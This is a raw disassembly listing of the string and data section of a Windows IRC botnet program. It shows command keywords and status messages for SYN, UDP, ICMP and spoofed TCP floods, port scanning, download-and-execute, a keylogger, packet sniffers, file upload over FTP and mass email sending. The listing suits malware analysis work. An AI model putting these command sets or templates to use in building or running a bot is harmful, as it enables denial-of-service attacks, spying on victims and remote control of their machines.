asc_42A440 db '-' ; DATA XREF: sub_401ACD:loc_4084F0�o
db 3, 34h, 2
dd 61647075h, 3026574h
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
dword_42A488 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6A19�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
; char asc_42A4C4[]
asc_42A4C4 db '-' ; DATA XREF: sub_401ACD+69AA�o
db 3, 34h, 2
dd 61526159h, 3022162h
aDownloadingUpd db '- Downloading update from: %s.',0
align 10h
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401ACD+6904�o
align 4
dword_42A4FC dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401ACD+68A2�o
dd 7325203Ah, 0
unk_42A518 db 2Dh ; - ; DATA XREF: sub_401ACD+6897�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
; char asc_42A53C[]
asc_42A53C db '-' ; DATA XREF: sub_401ACD+67FD�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToStar_1 db 'Failed to start search thread, error: <%d>.',0
; char asc_42A578[]
asc_42A578 db '-' ; DATA XREF: sub_401ACD+6787�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
dword_42A5A8 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD:loc_40818D�o
; sub_401ACD:loc_4091C7�o
; char asc_42A5B4[]
asc_42A5B4 db '-' ; DATA XREF: sub_401ACD+66AB�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_42A5D8 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408156�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 10h
unk_42A610 db 2Dh ; - ; DATA XREF: sub_401ACD+667F�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToStar_2 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42A648[]
asc_42A648 db '-' ; DATA XREF: sub_401ACD+660F�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
dword_42A674 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+658C�o
aFailedToStar_3 db '- Failed to start clone thread, error: <%d>.',0
align 10h
; char asc_42A6B0[]
asc_42A6B0 db '-' ; DATA XREF: sub_401ACD+651D�o
db 3, 34h, 2
dd 6E6F6C63h, 3027365h
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 10h
unk_42A6E0 db 2Dh ; - ; DATA XREF: sub_401ACD+64A4�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToStar_4 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42A718[]
asc_42A718 db '-' ; DATA XREF: sub_401ACD+6435�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42A748 db 2Dh ; - ; DATA XREF: sub_401ACD+63AB�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToStar_5 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42A780[]
asc_42A780 db '-' ; DATA XREF: sub_401ACD+633C�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 10h
unk_42A7B0 db 2Dh ; - ; DATA XREF: sub_401ACD+62C3�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToStar_6 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42A7E8[]
asc_42A7E8 db '-' ; DATA XREF: sub_401ACD+6254�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_42A824 db 2Dh ; - ; DATA XREF: sub_401ACD+61DB�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0
align 4
; char asc_42A864[]
asc_42A864 db '-' ; DATA XREF: sub_401ACD+616C�o
db 3, 34h, 2
dd 61526159h, 3022162h
aDownloadingUrl db '- Downloading URL: %s to: %s.',0
align 10h
unk_42A890 db 2Dh ; - ; DATA XREF: sub_401ACD+609D�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
; char asc_42A8D4[]
asc_42A8D4 db '-' ; DATA XREF: sub_401ACD+602E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
; char unk_42A910
unk_42A910 db 3 ; DATA XREF: sub_401ACD+5F31�o
a81Sc@nPortScan db '8,1-SC@N- Port scan started: %s:%d with delay: %d(ms).',0
; char aSSS_0[]
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_401ACD+5E85�o
align 4
aSSS db '[%s] * %s %s',0 ; DATA XREF: sub_401ACD+5DB0�o
align 4
; char dword_42A968
dword_42A968 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401ACD+5D22�o
; sub_401ACD+7074�o
unk_42A974 db 2Dh ; - ; DATA XREF: sub_401ACD+5CC0�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0
align 10h
; char asc_42A9B0[]
asc_42A9B0 db '-' ; DATA XREF: sub_401ACD+5C51�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 10h
unk_42AA00 db 3 ; DATA XREF: sub_401ACD+5BBA�o
; sub_401ACD+5FA0�o
a81Sc@nFailedTo db '8,1-SC@N- Failed to start scan thread, error: <%d>.',0
align 4
; char unk_42AA38
unk_42AA38 db 3 ; DATA XREF: sub_401ACD+5B4B�o
a81Sc@nSPortSca db '8,1-SC@N- %s Port Scan started on %s:%d with a delay of %d second'
db 's for %d minutes using %d threads.',0
align 10h
unk_42AAA0 db 3 ; DATA XREF: sub_401ACD+59D5�o
a81Sc@nFailed_0 db '8,1-SC@N- Failed to start scan, no IP specified.',0
align 4
unk_42AAD4 db 3 ; DATA XREF: sub_401ACD+5978�o
a81Sc@nFailed_1 db '8,1-SC@N- Failed to start scan, port is invalid.',0
align 4
; char asc_42AB08[]
asc_42AB08 db '-' ; DATA XREF: sub_401ACD:loc_407320�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s failed.',0
align 4
unk_42AB38 db 2Dh ; - ; DATA XREF: sub_401ACD+584C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s',0
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401ACD+5835�o
; char aSS_2[]
aSS_2 db '-s:%s',0 ; DATA XREF: sub_401ACD+581E�o
align 10h
; char aOpenSSSSPutSBy[]
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401ACD+57FB�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
; char Mode[]
Mode db 'ab',0 ; DATA XREF: sub_401ACD+57D7�o
align 4
; char aSIII_dll[]
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401ACD+57C6�o
align 4
; char asc_42ABA8[]
asc_42ABA8 db '-' ; DATA XREF: sub_401ACD+576D�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 4
; char aUpload[]
aUpload db 'upload',0 ; DATA XREF: sub_401ACD+574A�o
align 10h
; char unk_42ABD0
unk_42ABD0 db 3 ; DATA XREF: sub_401ACD+5714�o
a81Sc@nAlreadyD db '8,1-SC@N- Already %d scanning threads. Too many specified.',0
; char asc_42AC0C[]
asc_42AC0C db '-' ; DATA XREF: sub_401ACD+56B5�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToStar_8 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42AC44[]
asc_42AC44 db '-' ; DATA XREF: sub_401ACD+564A�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
unk_42AC8C db 2Dh ; - ; DATA XREF: sub_401ACD+5599�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 10h
; char asc_42ACC0[]
asc_42ACC0 db '-' ; DATA XREF: sub_401ACD+5565�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_42ACF4 db 2Dh ; - ; DATA XREF: sub_401ACD+5541�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
; char asc_42AD2C[]
asc_42AD2C db '-' ; DATA XREF: sub_401ACD+549F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
; char aIcmp_dllNotAva[]
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401ACD+5482�o
align 10h
unk_42AD80 db 2Dh ; - ; DATA XREF: sub_401ACD+546D�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToStar_9 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42ADB8[]
asc_42ADB8 db '-' ; DATA XREF: sub_401ACD+53FE�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 10h
; char asc_42AE00[]
asc_42AE00 db '-' ; DATA XREF: sub_401ACD:loc_406E1D�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_42AE38 db 2Dh ; - ; DATA XREF: sub_401ACD+5346�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_10 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42AE70[]
asc_42AE70 db '-' ; DATA XREF: sub_401ACD+52CC�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_401ACD+52BC�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401ACD+52B5�o
unk_42AEB4 db 2Dh ; - ; DATA XREF: sub_401ACD+521A�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 10h
; char aRandom_0[]
aRandom_0 db 'random',0 ; DATA XREF: sub_401ACD+520A�o
; sub_4149C1+312�o
align 4
; char aAck[]
aAck db 'ack',0 ; DATA XREF: sub_401ACD+51F3�o
; sub_4149C1+2F2�o
; char aHcon[]
aHcon db 'hcon',0 ; DATA XREF: sub_401ACD+517F�o
align 4
; char aHttpcon[]
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401ACD+516C�o
; char asc_42AEFC[]
asc_42AEFC db '-' ; DATA XREF: sub_401ACD+511D�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 10h
; char aHeloRndnickMai[]
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401ACD+50A9�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
; char aEmail[]
aEmail db 'email',0 ; DATA XREF: sub_401ACD+4FBE�o
align 4
; char aTcp[]
aTcp db 'tcp',0 ; DATA XREF: sub_401ACD+4FA7�o
; char aTcpflood[]
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401ACD+4F90�o
align 4
; char aVncHttpHostCha[]
aVncHttpHostCha db 'VNC: HTTP Host Changed To: %s',0 ; DATA XREF: sub_401ACD+4F66�o
align 4
; char aVnchost[]
aVnchost db 'vnchost',0 ; DATA XREF: sub_401ACD+4F48�o
; char aP[]
aP: ; DATA XREF: sub_401ACD+4F31�o
; .data:00438788�o ...
unicode 0, <p>,0
; char aPing_0[]
aPing_0 db 'ping',0 ; DATA XREF: sub_401ACD+4F1A�o
align 4
; char aPingflood[]
aPingflood db 'pingflood',0 ; DATA XREF: sub_401ACD+4F03�o
align 4
; char aNs[]
aNs db 'ns',0 ; DATA XREF: sub_401ACD+4EEC�o
align 4
; char aNetsend[]
aNetsend db 'netsend',0 ; DATA XREF: sub_401ACD+4ED5�o
; char aU[]
aU: ; DATA XREF: sub_401ACD+4EBE�o
; .data:00438780�o ...
unicode 0, <u>,0
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_401ACD+4EA7�o
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401ACD+4E90�o
align 4
; char aAd[]
aAd db 'ad',0 ; DATA XREF: sub_401ACD+4E79�o
align 4
; char aAdvscan[]
aAdvscan db 'advscan',0 ; DATA XREF: sub_401ACD+4E62�o
; char aPsc[]
aPsc db 'psc',0 ; DATA XREF: sub_401ACD+4E4B�o
; char aPortscan[]
aPortscan db 'portscan',0 ; DATA XREF: sub_401ACD+4E34�o
align 10h
; char aC_a[]
aC_a db 'c_a',0 ; DATA XREF: sub_401ACD+4E0E�o
; char aC_action[]
aC_action db 'c_action',0 ; DATA XREF: sub_401ACD+4DF7�o
align 10h
; char aC_pm[]
aC_pm db 'c_pm',0 ; DATA XREF: sub_401ACD+4DE0�o
align 4
; char aC_privmsg[]
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401ACD+4DC9�o
align 4
; char aSc[]
aSc db 'sc',0 ; DATA XREF: sub_401ACD+4DB2�o
align 4
; char aScan_0[]
aScan_0 db 'scan',0 ; DATA XREF: sub_401ACD+4D9B�o
align 10h
; char aRd[]
aRd db 'rd',0 ; DATA XREF: sub_401ACD+4D84�o
align 4
; char aRedirect[]
aRedirect db 'redirect',0 ; DATA XREF: sub_401ACD+4D6D�o
align 10h
; char aNazel3[]
aNazel3 db 'NAZEL3',0 ; DATA XREF: sub_401ACD+4D3F�o
; sub_401ACD+4D56�o
align 4
; char aWonk[]
aWonk db 'wonk',0 ; DATA XREF: sub_401ACD+4D28�o
align 10h
; char aPhatwonk[]
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401ACD+4D11�o
align 4
dword_42B05C dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4D04�o
aFailedToSta_11 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42B098[]
asc_42B098 db '-' ; DATA XREF: sub_401ACD+4C95�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
; char aSkysyn[]
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401ACD+4C12�o
align 10h
; char aSyn[]
aSyn db 'syn',0 ; DATA XREF: sub_401ACD+4BFB�o
; sub_401ACD+51DB�o ...
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_401ACD+4BE4�o
align 10h
unk_42B0E0 db 2Dh ; - ; DATA XREF: sub_401ACD+4BD7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_12 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char aWisdom_udp[]
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401ACD+4B00�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401ACD+4AE9�o
; sub_413694:loc_4137C0�o
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401ACD+4AD2�o
; sub_413694:loc_4137A4�o
align 4
; char aDdos_syn[]
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401ACD+4ABB�o
; sub_413694+F1�o
align 10h
; char aClone_0[]
aClone_0 db 'clone',0 ; DATA XREF: sub_401ACD+4A8D�o
align 4
; char aIcmp[]
aIcmp db 'icmp',0 ; DATA XREF: sub_401ACD+4A64�o
align 10h
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401ACD+4A4D�o
align 4
; char aMv[]
aMv db 'mv',0 ; DATA XREF: sub_401ACD+4A36�o
align 10h
; char aRename[]
aRename db 'rename',0 ; DATA XREF: sub_401ACD+4A1F�o
align 4
; char aFf[]
aFf db 'ff',0 ; DATA XREF: sub_401ACD+4A08�o
align 4
; char aFindfile[]
aFindfile db 'findfile',0 ; DATA XREF: sub_401ACD+49F1�o
align 4
; char aE[]
aE: ; DATA XREF: sub_401ACD+49DA�o
; .data:00438770�o ...
unicode 0, <e>,0
; char aExecute[]
aExecute db 'execute',0 ; DATA XREF: sub_401ACD+49C3�o
; char aHadeth3[]
aHadeth3 db 'HADETH3',0 ; DATA XREF: sub_401ACD+4995�o
; sub_401ACD+49AC�o
; char aDe[]
aDe db 'de',0 ; DATA XREF: sub_401ACD+497E�o
align 10h
; char aDelay[]
aDelay db 'delay',0 ; DATA XREF: sub_401ACD+4967�o
align 4
; char aRp[]
aRp db 'rp',0 ; DATA XREF: sub_401ACD+4950�o
align 4
; char aRepeat[]
aRepeat db 'repeat',0 ; DATA XREF: sub_401ACD+4939�o
; sub_401ACD+6B0C�o
align 4
; char aTsn[]
aTsn db 'tsn',0 ; DATA XREF: sub_401ACD+4922�o
; char aTsunami[]
aTsunami db 'tsunami',0 ; DATA XREF: sub_401ACD+490B�o
; char aT3[]
aT3 db 't3',0 ; DATA XREF: sub_401ACD+48F4�o
align 4
; char aTarga3[]
aTarga3 db 'targa3',0 ; DATA XREF: sub_401ACD+48DD�o
align 4
; char aC_p[]
aC_p db 'c_p',0 ; DATA XREF: sub_401ACD+48C6�o
; char aC_part[]
aC_part db 'c_part',0 ; DATA XREF: sub_401ACD+48AF�o
align 4
; char aC_j[]
aC_j db 'c_j',0 ; DATA XREF: sub_401ACD+4898�o
; char aC_join[]
aC_join db 'c_join',0 ; DATA XREF: sub_401ACD+4881�o
align 4
; char aC_n[]
aC_n db 'c_n',0 ; DATA XREF: sub_401ACD+486A�o
; char aC_nick[]
aC_nick db 'c_nick',0 ; DATA XREF: sub_401ACD+4853�o
align 10h
; char aC_m[]
aC_m db 'c_m',0 ; DATA XREF: sub_401ACD+483C�o
; char aC_mode[]
aC_mode db 'c_mode',0 ; DATA XREF: sub_401ACD+4825�o
align 4
; char aC_r[]
aC_r db 'c_r',0 ; DATA XREF: sub_401ACD+480E�o
; char aC_raw[]
aC_raw db 'c_raw',0 ; DATA XREF: sub_401ACD+47F7�o
align 4
; char aM_0[]
aM_0: ; DATA XREF: sub_401ACD+47E0�o
; .data:004387C8�o ...
unicode 0, <m>,0
; char aCy[]
aCy db 'cy',0 ; DATA XREF: sub_401ACD+47B2�o
align 10h
; char aCycle[]
aCycle db 'cycle',0 ; DATA XREF: sub_401ACD+479B�o
align 4
; char aA[]
aA: ; DATA XREF: sub_401ACD+4784�o
; .data:0043878C�o
unicode 0, <a>,0
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_401ACD+476D�o
align 4
; char aPrivmsg_0[]
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_401ACD+473F�o
; char aAa[]
aAa db 'aa',0 ; DATA XREF: sub_401ACD+4728�o
align 10h
; char aAddalias[]
aAddalias db 'addalias',0 ; DATA XREF: sub_401ACD+4711�o
align 4
; char aKl[]
aKl db 'kl',0 ; DATA XREF: sub_401ACD+46FA�o
align 10h
; char aKilllog[]
aKilllog db 'killlog',0 ; DATA XREF: sub_401ACD+46E3�o
; char aGh[]
aGh db 'gh',0 ; DATA XREF: sub_401ACD+46BA�o
align 4
; char aGethost[]
aGethost db 'gethost',0 ; DATA XREF: sub_401ACD+46A3�o
unk_42B254 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406163�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_42B270 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406159�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
; char aSend_0[]
aSend_0 db 'send',0 ; DATA XREF: sub_401ACD+465B�o
; sub_409909+5F0�o
align 4
unk_42B29C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40611D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
unk_42B2BC db 2Dh ; - ; DATA XREF: sub_401ACD+4646�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_42B2DC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406091�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
unk_42B2FC db 2Dh ; - ; DATA XREF: sub_401ACD+45BA�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 10h
; char aShare[]
aShare db 'share',0 ; DATA XREF: sub_401ACD+4567�o
align 4
; char aContinue[]
aContinue db 'continue',0 ; DATA XREF: sub_401ACD+4527�o
align 4
; char aPause[]
aPause db 'pause',0 ; DATA XREF: sub_401ACD+450F�o
align 4
unk_42B33C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405FB9�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
unk_42B35C db 2Dh ; - ; DATA XREF: sub_401ACD+44E2�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 10h
; char aStart[]
aStart db 'start',0 ; DATA XREF: sub_401ACD+44AB�o
align 4
unk_42B388 db 2Dh ; - ; DATA XREF: sub_401ACD+4478�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
; char aNet[]
aNet db 'net',0 ; DATA XREF: sub_401ACD+4454�o
; char aStop[]
aStop db 'stop',0 ; DATA XREF: sub_401ACD+4426�o
; sub_401ACD+443D�o ...
align 4
; char aKeylog[]
aKeylog db 'keylog',0 ; DATA XREF: sub_401ACD+440F�o
align 4
; char aKeyloger[]
aKeyloger db 'keyloger',0 ; DATA XREF: sub_401ACD+43F8�o
align 10h
dword_42B3E0 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD:loc_405EB8�o
aNoThreadFound_ db '- No thread found.',0
align 10h
dword_42B400 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43E1�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_42B438 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43B3�o
aFailedToSta_13 db '- Failed to start server, error: <%d>.',0
align 4
; char asc_42B46C[]
asc_42B46C db '-' ; DATA XREF: sub_401ACD+4366�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerRunnin_0 db '- Server running on Port: 113.',0
align 4
dword_42B498 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4356�o
aAlreadyRunning db '- Already running.',0
align 4
; char aIdent[]
aIdent db 'ident',0 ; DATA XREF: sub_401ACD+4325�o
align 10h
unk_42B4C0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405DE5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoVrxSnifferTh db '- No VrX sniffer thread found.',0
unk_42B4EC db 2Dh ; - ; DATA XREF: sub_401ACD+430E�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVrxSnifferStop db '- VrX sniffer stopped. (%d thread(s) stopped.)',0
unk_42B528 db 2Dh ; - ; DATA XREF: sub_401ACD+42E0�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_14 db '- Failed to start sniffer thread, error: <%d>.',0
; char asc_42B564[]
asc_42B564 db '-' ; DATA XREF: sub_401ACD+4271�o
db 3, 34h, 2
db 53h ; S
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVrxPacketSniff db '- VrX packet sniffer active.',0
align 10h
unk_42B590 db 2Dh ; - ; DATA XREF: sub_401ACD+420A�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_0 db '- Already running.',0
; char aSniffer[]
aSniffer db 'sniffer',0 ; DATA XREF: sub_401ACD+41D5�o
dword_42B5B8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD:loc_405C95�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 4
dword_42B5E4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+41BE�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 10h
dword_42B620 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+4190�o
aFailedToSta_15 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
; char asc_42B65C[]
asc_42B65C db '-' ; DATA XREF: sub_401ACD+4121�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_42B68C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+40BA�o
aAlreadyRunni_1 db '- Already running.',0
align 4
; char aOn[]
aOn db 'on',0 ; DATA XREF: sub_401ACD+409A�o
; sub_401ACD+41EA�o ...
align 10h
; char aPsniff[]
aPsniff db 'psniff',0 ; DATA XREF: sub_401ACD+4085�o
align 4
; char aRf[]
aRf db 'rf',0 ; DATA XREF: sub_401ACD+406E�o
align 4
; char aReadfile[]
aReadfile db 'readfile',0 ; DATA XREF: sub_401ACD+4057�o
align 4
; char aCm[]
aCm db 'cm',0 ; DATA XREF: sub_401ACD+4040�o
align 4
; char aCmd[]
aCmd db 'cmd',0 ; DATA XREF: sub_401ACD+4029�o
; char aMirc[]
aMirc db 'mirc',0 ; DATA XREF: sub_401ACD+4012�o
align 4
; char aMirccmd[]
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401ACD+3FFB�o
; char aV[]
aV: ; DATA XREF: sub_401ACD+3FE4�o
; .data:004387BC�o ...
unicode 0, <v>,0
; char aVisit[]
aVisit db 'visit',0 ; DATA XREF: sub_401ACD+3FCD�o
align 4
; char aLi[]
aLi db 'li',0 ; DATA XREF: sub_401ACD+3FB6�o
align 10h
; char aList[]
aList db 'list',0 ; DATA XREF: sub_401ACD+3F9F�o
align 4
; char aGt[]
aGt db 'gt',0 ; DATA XREF: sub_401ACD+3F88�o
align 4
; char aDel[]
aDel db 'del',0 ; DATA XREF: sub_401ACD+3F5A�o
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_401ACD+3F43�o
; sub_401ACD+453F�o
align 4
; char aKi[]
